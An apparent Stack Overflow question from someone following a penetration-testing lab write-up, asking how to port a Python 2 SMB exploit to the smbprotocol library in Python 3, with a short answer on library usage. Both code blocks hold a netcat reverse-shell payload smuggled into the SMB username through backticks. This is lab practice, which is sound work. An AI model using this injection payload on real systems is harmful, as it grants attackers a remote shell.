# Connecting to an SMB share in python3

Tags: python-3.x, smb, penetration-testing

I'm following a pentest writeup which uses Python 2 to connect to an smb share:

```
Python 2.7.17 (default, Oct 19 2019, 23:36:22) 
[GCC 9.2.1 20191008] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from smb.SMBConnection import SMBConnection
>>> payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.X 9999 >/tmp/f'
>>> username = "/=`nohup " + payload + "`"
>>> connection = SMBConnection(username, "", "", "")
>>> connection.connect("10.10.10.3",445)
```

I'm trying to accomplish the same thing using Python 3, this is how far I've gotten:

```
Python 3.9.2 (default, Feb 28 2021, 17:03:44) 
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from smbprotocol.connection import Connection
>>> payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.X 9999 >/tmp/f'
>>> username = "/=`nohup " + payload + "`"
>>> connection = Connection(username, "", "", "")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/user/.local/lib/python3.9/site-packages/smbprotocol/connection.py", line 638, in __init__
    log.info("Initialising connection, guid: %s, require_signing: %s, "
TypeError: %d format: a number is required, not str
>>> import smbclient
>>> smbclient.ClientConfig(username)
<smbclient._pool.ClientConfig object at 0x7f6d093ac2e0>
>>> connection = smbclient.ClientConfig(username)
>>> connection.connect("10.X.X.X",445)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'ClientConfig' object has no attribute 'connect'
>>>
```

The module I am using is https://github.com/jborean93/smbprotocol

Comment: Yes there are lines in my attempt from the README

Answer (score 0):

I think the problem with the last attempt on there (with smbclient) is that you need to change connection back to smbclient. As it is when you call connection the second time, you are calling smbclient.ClientConfig()

the docs suggest you do it like this(after you've done your ClientConfig):

with smbclient.open_file(r"\server\share\directory\file.txt", mode="w") as fd:
fd.write(u"file contents")

I think someone else mentioned the docs as well, but here, they have  has some good examples:

https://pypi.org/project/smbprotocol/